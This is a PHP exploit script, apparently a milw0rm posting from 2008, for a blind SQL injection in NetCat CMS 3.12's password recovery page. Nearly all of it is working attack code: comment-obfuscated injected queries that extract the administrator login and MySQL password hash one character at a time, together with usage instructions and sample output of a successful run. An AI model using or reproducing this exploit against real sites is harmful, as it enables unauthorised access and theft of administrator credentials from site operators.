CMS NetCat 3.12 - password_recovery.php Blind SQL Injection
<?
/*
NetCat Blind SQL Injection exploit by s4avrd0w [[email protected]]
Versions affected 3.12
More info: http://www.netcat.ru/
* tested on version 3.12
usage:
# ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID
The options are required:
-u The user identifier (number in table)
-s Target for exploiting
example:
# ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2
[+] Phase 1 brute login.
[+] Brute 1 symbol...
...........a
[+] Brute 2 symbol...
..............d
[+] Brute 3 symbol...
.......................m
[+] Brute 4 symbol...
...................i
[+] Brute 5 symbol...
........................n
[+] Brute 6 symbol...
.....................................
[+] Phase 1 successfully finished: admin
[+] Phase 2 brute password-hash.
[+] Brute 1 symbol...
*
[+] Brute 2 symbol...
.0
[+] Brute 3 symbol...
.0
[+] Brute N symbol...
<...>
[+] Brute 42 symbol...
.....................................
[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9
[+] Exploiting is finished successfully
[+] Login - admin
[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
[+] Decrypt MySQL hash and login into NetCat CMS.
*/
function http_connect($query)
{
global $server;
$headers = array(
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
'Referer' => $server
);
$res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET);
$res_http->addHeaders($headers);
try {
$response = $res_http->send()->getBody();
if (eregi("page_header", $response))
{
return 1;
}
else
{
return 0;
}
} catch (HttpException $exception) {
print "[-] Not connected";
exit(0);
}
}
function brute($User_id,$table)
{
$ret_str = "";
for ($i=1;$i<43;$i++)
{
print "[+] Brute $i symbol...\n";
for ($j=42;$j<123;$j++)
{
$q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*";
if (http_connect($q))
{
$ret_str=$ret_str.chr($j);
print chr($j)."\n";
break;
}
print ".";
if ($j == 57) $j = 96;
if ($j == 42) $j = 47;
}
if ($j == 123) break;
}
return $ret_str;
}
function help_argc($script_name)
{
print "
usage:
# ./".$script_name." -s=NetCat_server -u=User_ID
The options are required:
-u The user identifier (number in table)
-s Target for exploiting
example:
# ./".$script_name." -s=http://localhost/netcat/ -u=1
[+] Phase 1 brute login.
[+] Brute 1 symbol...
..1
[+] Brute 2 symbol...
.....................................
[+] Phase 1 successfully finished: 1
[+] Phase 2 brute password-hash.
[+] Brute 1 symbol...
.....................................
[+] Phase 2 successfully finished:
[+] Exploiting is finished successfully
[+] Login - 1
[+] MySQL hash -
[+] You can login into NetCat CMS with the empty password
";
}
function successfully($login,$hash)
{
print "
[+] Exploiting is finished successfully
[+] Login - $login
[+] MySQL hash - $hash
";
if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
else print "[+] You can login into NetCat CMS with the empty password\n";
}
if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
help_argc($argv[0]);
exit(0);
}
else
{
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg,1,1);
if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
}
}
if ($ARG[s] && $ARG[u])
{
$server = $ARG[s];
$User_id = intval($ARG[u]);
$User_id--;
print "[+] Phase 1 brute login.\n";
$login = brute($User_id,"Login");
print "\n[+] Phase 1 successfully finished: $login\n";
print "[+] Phase 2 brute password-hash.\n";
$hash = brute($User_id,"Password");
print "\n[+] Phase 2 successfully finished: $hash\n";
successfully($login,$hash);
}
else
{
help_argc($argv[0]);
exit(0);
}
}
?>
# milw0rm.com [2008-12-23]